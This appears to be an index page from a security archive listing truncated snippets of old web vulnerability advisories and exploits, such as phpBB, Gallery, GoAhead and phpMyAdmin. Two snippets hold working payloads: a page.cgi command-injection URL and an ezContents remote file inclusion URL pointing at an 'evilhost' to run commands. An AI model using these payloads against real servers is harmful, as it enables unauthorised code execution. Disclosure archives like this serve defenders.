BadBlue Webserver Connection Saturation Remote DoS

Binary data 2127.prm...

page.txt

Script affected: page.cgi - content/template merging CGI Author: Andrew Kilpatrick We can execute arbitrary commands with same id of the webserver: http://www.vulnerable.com/page.cgi?url=.html|id| Thanks : Infektion Group irc.phey.net -j infektion...

phpBB 2.0.x - viewtopic.php PHP Script Injection

phpBB 2.0.x - viewtopic.php PHP Script Injection source: https://www.securityfocus.com/bid/10701/info The 'viewtopic.php' phpBB script is prone to a remote PHP script injection vulnerability because the application fails to properly sanitize user-supplied URI parameters before using them to...

DSA-516 postgresql - buffer overflow

Bulletin has no description...

Aldos Webserver multiple bugs

Information disclosure, directory traversal...

waraxe-2004-SA012.txt

================================================================================ waraxe-2004-SA012 ================================================================================ Multiple vulnerabilities in XMB 1.8 Partagium SP3 and 1.9 Nexus Beta...

[ GLSA 200402-04 ] Gallery <= 1.4.1 and below remote exploit vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200402-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org - - - - - - - - - - - - - - - ...

Gallery 1.4.1 and below remote exploit vulnerability

Background Gallery is an open source image management system written in PHP. More information is available at http://gallery.sourceforge.net Description Starting in the 1.3.1 release, Gallery includes code to simulate the behaviour of the PHP 'registerglobals' variable in environments where that...

PalmOShttpd.txt

Introduction 'httpd' for PalmOS was originally written by Jim Rees, and is a simple webserver for Palm powered PDAs. Since the development of httpd for Palm stopped, I decided to modify 'httpd' slightly, and re-release it on freshmeat.net. However, httpd contains a bug which causes the device to...

Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior Summary : phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW. There is a vulnerability in the current stable version of phpMyAdmin...

Kietu 23 - index.php Remote File Inclusion

Kietu 23 - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/9499/info A flaw exists in the Kietu 'index.php' script that may permit remote attackers to include malicious remote files. Remote users may influence the include path for the 'config.php' configuration file, whi...

geoHTTP.txt

Software: GeoHttpServer Vendor: GEOVISION INC http://www.geovision.com.tw Versions: ALL Platforms: Unix Bug: Authentification Bypass Vulnerability & D.O.S Denial Of Service Risk: High Exploitation: Remote with browser Date: 22 Jan 2004 Author: Rafel Ivgi, The-Insider e-mail: [email protected]...

goahead.txt

Luigi Auriemma Application: Goahead webserver http://www.goahead.com/webserver/webserver.htm Versions: = 2.1.8 Platforms: multiplatform Bug: resources consumption Risk: medium/high Exploitation: remote Date: 19 Jan 2004 Author: Luigi Auriemma e-mail: [email protected] web:...

goahead2.txt

Luigi Auriemma Application: Goahead webserver http://www.goahead.com/webserver/webserver.htm Versions: = 2.1.8 Platforms: multiplatform Bug: bypassing of special directories management with the effect of downloading cgi-bin files and more Risk: medium/high Exploitation: remote with browser Date: ...

Resources consumption in Goahead webserver <= 2.1.8

Luigi Auriemma Application: Goahead webserver http://www.goahead.com/webserver/webserver.htm Versions: = 2.1.8 Platforms: multiplatform Bug: resources consumption Risk: medium/high Exploitation: remote Date: 19 Jan 2004 Author: Luigi Auriemma e-mail: [email protected] web:...

Denial of service in Getware's built-in webserver (Webcam Live and Photohost)

Luigi Auriemma Application: Getware's built-in webserver http://www.getware.com Versions: WebCam Live = 2.01 Photohost = 4.0 Platforms: Windows Bug: Denial of service Risk: medium Exploitation: remote Date: 19 Jan 2004 Author: Luigi Auriemma e-mail: [email protected] web:...

Directories management bypassing in Goahead webserver <= 2.1.8

Luigi Auriemma Application: Goahead webserver http://www.goahead.com/webserver/webserver.htm Versions: = 2.1.8 Platforms: multiplatform Bug: bypassing of special directories management with the effect of downloading cgi-bin files and more Risk: medium/high Exploitation: remote with browser Date: ...

aiptek netcam WebServer 0.93.15 - Directory Traversal

source: https://www.securityfocus.com/bid/9456/info It has been reported that the NETCam webserver of NETCam Viewer may be prone to a directory traversal vulnerability that may allow a remote attacker to access information outside the server root directory. AIPTEK NETCam Viewer versions 1.0.0.28...

ezcontents.txt

Remote Code Execution in ezContents "ezContents" from www.ezcontents.org allows to execute code. Example: Create the following file on your webserver: ----index.php---- ----------------- And then type in the following URL: http://targethost/module.php?link=http://evilhost/index.php&cmd=cat...

CVE-2003-1318

Twilight Webserver 1.3.3.0 allows remote attackers to cause a denial of service application crash via a GET request for a long URI, a different vulnerability than CVE-2004-2376...